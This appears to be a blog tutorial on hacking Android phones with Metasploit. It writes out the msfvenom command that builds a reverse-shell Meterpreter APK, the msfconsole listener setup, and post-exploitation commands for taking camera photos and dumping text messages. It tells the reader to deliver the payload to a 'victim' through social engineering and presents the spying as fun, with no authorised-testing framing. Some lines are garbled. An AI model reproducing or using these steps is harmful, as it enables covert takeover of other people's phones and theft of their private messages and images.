16 Oct
16Oct

Things you’ll need:

1. Kali Linux

2. Metasploit and MSFVenom: Included frameworks in Kali Linux

2. An Android Device(Victim)

3. Some Social Engineering skills

4. Curiosity and a sharp Brain

What is Metasploit and MSFVenom?

So, today I’ll show one of the most easy and famous methods to hack Android devices using Metasploit. According to Wikipedia, The Metasploit Project” is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development”. Basically, Metasploit is a Framework providing a Pentesting software platform for Developing, Testing and and Executing exploits. Likewise, MSFVenom, a subpart(Framework Instance) of Metasploit, an integration of two original individual framework instances, msfconsole and msfencode. Just remember it simply helps to create extremely powerful Malicious Payloads(not just for Android hacking but for a hell lot more!) and the ability to encode them.

Find out more about Metasploit on it’s Official Site or over to it’s Wiki Page.

How to use MSFVenom to hack Android devices?

So there are basically 2 steps involved here to be able to successfully hack Android Devices : Generation of the Payload and Starting up a Listener.

 

How to Hack Android Devices |

Part 1: Generating the Payload

1. Fire up your Kali and Open a Terminal.

hack android device-1

2. Copy your Internal IP Address.(Note: You might have something other than wlan0 for inet. Don’t worry it’s just the network interface!)

     ifconfig
hack android device-2

3. Enter the following commands in a new terminal to generate the Reverse TCP Payload.(Note: Replace the LHOST with your internal IP from Step 2)

    "msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.213 LPORT=4444      R >/root/Desktop/FILENAME.apk"      • -p : Specify Payload      • LHOST : Your ip address      • LPORT : Listening Port number      • R : RAW Format      • >/root/Desktop/FILENAME.apk => Location to save the Payload
hack android device-3
hack android device-4

So, That’s it! You’re almost halfway into hacking that badass Android device! Just send your Payload to the Victim(Using some Social Engineering :P). And your Payload is ready to create Mayhem.

 

How to Hack Android Devices |

Part 2: Starting a Listener

Open up a new terminal. Now, enter the commands as shown:

     msfconsole
hack android device-5
     use exploit/multi/handler
hack android device-6
     set payload android/meterpreter/reverse_tcp
hack android device-7
     set LHOST 192.168.8.134 (Enter your Internal IP same as in the 1st Part)
hack android device-8
     set LPORT 4444
hack android device-9
     exploit
hack android device-10

Now as soon as the Victim installs and tries to open up the Payload(apk) on their device, you’ll get a Meterpreter Session.

hack android device-11

So, there you have it. Complete access of the Victim’s phone right on your screen!


lso, you can check the various available commands and options using the help command.

Yu 

So, it’s all done. But nonetheless I won’t just leave you hanging. To sum up the journey of How to hack Android using MSFVenom , here are some examples of just absolutely fun crazy stuff you could certainly do!

Taking a photo with the Camera! >webcam_snap
hack android device-13
hack android device-14
Dumping Text Messages!>sms_dump
hack android device-15
hack android device-16

A SIMPLE OVERVIEW HOW TO GET STARTED HACKING FOLLOW THIS TUTORIAL

 

Comments
* The email will not be published on the website.